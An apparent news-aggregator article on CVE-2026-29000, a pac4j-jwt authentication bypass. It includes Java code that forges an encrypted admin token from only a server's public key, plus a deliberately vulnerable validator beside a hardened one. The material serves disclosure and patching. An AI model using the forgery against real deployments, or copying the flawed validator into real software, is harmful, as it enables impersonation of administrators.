BotBeat

CodeAnt AI, Research, 2026-03-05

CodeAnt AI Discovers Critical CVSS 10.0 Authentication Bypass in pac4j-jwt Library

Key Takeaways

  • CVE-2026-29000 is a CVSS 10.0 critical authentication bypass in pac4j-jwt that lets an attacker forge tokens and impersonate any user, including administrators, using only the server's public key
  • The vulnerability was discovered by CodeAnt AI's AI code reviewer during research validating whether CVE patches actually fix the issues they claim to fix
  • Attackers can forge JWT tokens with arbitrary claims by crafting a JWE whose payload carries claims directly, with no inner signed JWT, which causes signature verification to be silently skipped
Source: Hacker News, https://www.codeant.ai/security-research/pac4j-jwt-authentication-bypass-public-key

Summary

CodeAnt AI's security research team has disclosed CVE-2026-29000, a critical authentication bypass vulnerability in pac4j-jwt, a widely-used Java authentication library. The flaw, rated CVSS 10.0, allows attackers to forge JWT tokens and impersonate any user—including administrators—using only the server's public RSA key. The vulnerability was discovered through CodeAnt AI's AI-powered code review system during an internal research project analyzing whether CVE patches in open-source packages actually fix reported vulnerabilities.

The vulnerability stems from a logic error in JwtAuthenticator.java, where signature verification is conditionally skipped based on a null check. In flows that use two-layer protection (JWE encryption wrapped around a JWS-signed JWT), the code decrypts the outer JWE and attempts to extract the inner signed JWT from the decrypted payload. If that extraction returns null, which is exactly what happens when an attacker builds a JWE whose payload is a bare claims set rather than a nested signed JWT, the signature verification block is skipped entirely and the server authenticates the user from the unverified claims. The encryption layer offers no protection here: a JWE addressed to the server is produced with the server's public RSA key, which anyone may hold, so a successful decryption proves nothing about who created the token. Only the signature, verified against the issuer's public key, establishes that.
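The pattern described above, as an added illustration written for this page rather than pac4j's own code. It assumes the nimbus-jose-jwt library (the JOSE implementation pac4j builds on); the class, the method names, the two generated key pairs and the claim values are hypothetical. The attacker's forge step uses only the server's public encryption key. The vulnerable validator gates signature verification on the inner JWT being non-null and therefore accepts the forged token; the hardened validator rejects any encrypted token whose payload is not a signed JWT.

```java
import com.nimbusds.jose.EncryptionMethod;
import com.nimbusds.jose.JOSEException;
import com.nimbusds.jose.JWEAlgorithm;
import com.nimbusds.jose.JWEHeader;
import com.nimbusds.jose.crypto.RSADecrypter;
import com.nimbusds.jose.crypto.RSAEncrypter;
import com.nimbusds.jose.crypto.RSASSAVerifier;
import com.nimbusds.jwt.EncryptedJWT;
import com.nimbusds.jwt.JWT;
import com.nimbusds.jwt.JWTClaimsSet;
import com.nimbusds.jwt.JWTParser;
import com.nimbusds.jwt.SignedJWT;

import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.interfaces.RSAPrivateKey;
import java.security.interfaces.RSAPublicKey;
import java.text.ParseException;

// Hypothetical demo class; not part of pac4j or nimbus-jose-jwt.
public class NestedJwtBypassDemo {

    // Attacker side: needs only the server's public encryption key. The JWE's
    // payload is a bare claims set, so there is no inner signed JWT at all.
    static String forgeUnsignedJwe(RSAPublicKey serverEncryptionKey) throws JOSEException {
        JWTClaimsSet claims = new JWTClaimsSet.Builder()
                .subject("admin")            // constructed claim values
                .claim("role", "admin")
                .build();
        EncryptedJWT jwe = new EncryptedJWT(
                new JWEHeader(JWEAlgorithm.RSA_OAEP_256, EncryptionMethod.A256GCM), claims);
        jwe.encrypt(new RSAEncrypter(serverEncryptionKey));
        return jwe.serialize();
    }

    // Server side, vulnerable shape: verification only runs when a nested JWS
    // is present, so a JWE carrying bare claims skips it and is trusted as-is.
    static JWTClaimsSet validateVulnerable(String token, RSAPrivateKey decryptionKey,
                                           RSAPublicKey signatureKey)
            throws ParseException, JOSEException {
        JWT jwt = JWTParser.parse(token);
        if (!(jwt instanceof EncryptedJWT)) {
            throw new JOSEException("only encrypted tokens are handled in this demo");
        }
        EncryptedJWT enc = (EncryptedJWT) jwt;
        enc.decrypt(new RSADecrypter(decryptionKey));
        // toSignedJWT() returns null when the decrypted payload is not a nested JWS
        SignedJWT inner = enc.getPayload().toSignedJWT();
        if (inner != null) {                          // the null check that gates verification
            if (!inner.verify(new RSASSAVerifier(signatureKey))) {
                throw new JOSEException("invalid signature");
            }
            return inner.getJWTClaimsSet();
        }
        // BUG: falls through and trusts claims that anyone with the public key could encrypt
        return enc.getJWTClaimsSet();
    }

    // Server side, hardened shape: an encrypted token must wrap a signed JWT, and
    // that signature is always verified before any claim is used.
    static JWTClaimsSet validateHardened(String token, RSAPrivateKey decryptionKey,
                                         RSAPublicKey signatureKey)
            throws ParseException, JOSEException {
        JWT jwt = JWTParser.parse(token);
        SignedJWT signed;
        if (jwt instanceof EncryptedJWT) {
            EncryptedJWT enc = (EncryptedJWT) jwt;
            enc.decrypt(new RSADecrypter(decryptionKey));
            signed = enc.getPayload().toSignedJWT();
            if (signed == null) {
                throw new JOSEException("encrypted token must wrap a signed JWT");
            }
        } else if (jwt instanceof SignedJWT) {
            signed = (SignedJWT) jwt;
        } else {
            throw new JOSEException("unsigned tokens are not accepted");
        }
        if (!signed.verify(new RSASSAVerifier(signatureKey))) {
            throw new JOSEException("invalid signature");
        }
        return signed.getJWTClaimsSet();
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator gen = KeyPairGenerator.getInstance("RSA");
        gen.initialize(2048);
        KeyPair encryptionPair = gen.generateKeyPair(); // server's JWE key pair (hypothetical)
        KeyPair signingPair = gen.generateKeyPair();    // server's JWS key pair; private key never used below

        String forged = forgeUnsignedJwe((RSAPublicKey) encryptionPair.getPublic());

        JWTClaimsSet accepted = validateVulnerable(forged,
                (RSAPrivateKey) encryptionPair.getPrivate(), (RSAPublicKey) signingPair.getPublic());
        System.out.println("vulnerable path accepted sub=" + accepted.getSubject()
                + " role=" + accepted.getStringClaim("role"));

        try {
            validateHardened(forged,
                    (RSAPrivateKey) encryptionPair.getPrivate(), (RSAPublicKey) signingPair.getPublic());
            System.out.println("hardened path accepted the token (unexpected)");
        } catch (JOSEException e) {
            System.out.println("hardened path rejected the token: " + e.getMessage());
        }
    }
}
```

The same forged token is a useful regression check against a deployment: if an endpoint behind pac4j-jwt accepts a JWE built this way from nothing but its published public key, the instance is still running vulnerable code.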

Pac4j maintainer Jérôme Leleu has confirmed the flaw, released fixed versions, and published a security advisory crediting CodeAnt AI's research. Organizations using pac4j-jwt are urged to update immediately to the patched versions: 4.5.9+ for the 4.x line, 5.7.9+ for 5.x, and 6.3.3+ for 6.x. The discovery highlights both the effectiveness of AI-assisted security research and the importance of correct cryptographic composition: encryption and signature verification serve different security purposes (confidentiality versus authenticity and integrity) and cannot be treated as interchangeable.

  • All pac4j-jwt users must upgrade immediately to versions 4.5.9+, 5.7.9+, or 6.3.3+ depending on their release line
  • The flaw demonstrates the critical difference between encryption (confidentiality) and signatures (authenticity/integrity) in JWT security

Editorial Opinion

This discovery showcases the promising potential of AI-assisted security research in identifying subtle logic vulnerabilities that traditional scanning might miss. The fact that CodeAnt AI's system could flag a nuanced null check anomaly that led to complete authentication bypass demonstrates how AI code review can augment human security expertise. However, the vulnerability itself serves as a sobering reminder that even mature, widely-deployed authentication libraries can harbor critical flaws in cryptographic implementation—underscoring why security cannot be treated as a solved problem even in established codebases.

Tags: AI Agents, Machine Learning, Cybersecurity, Open Source
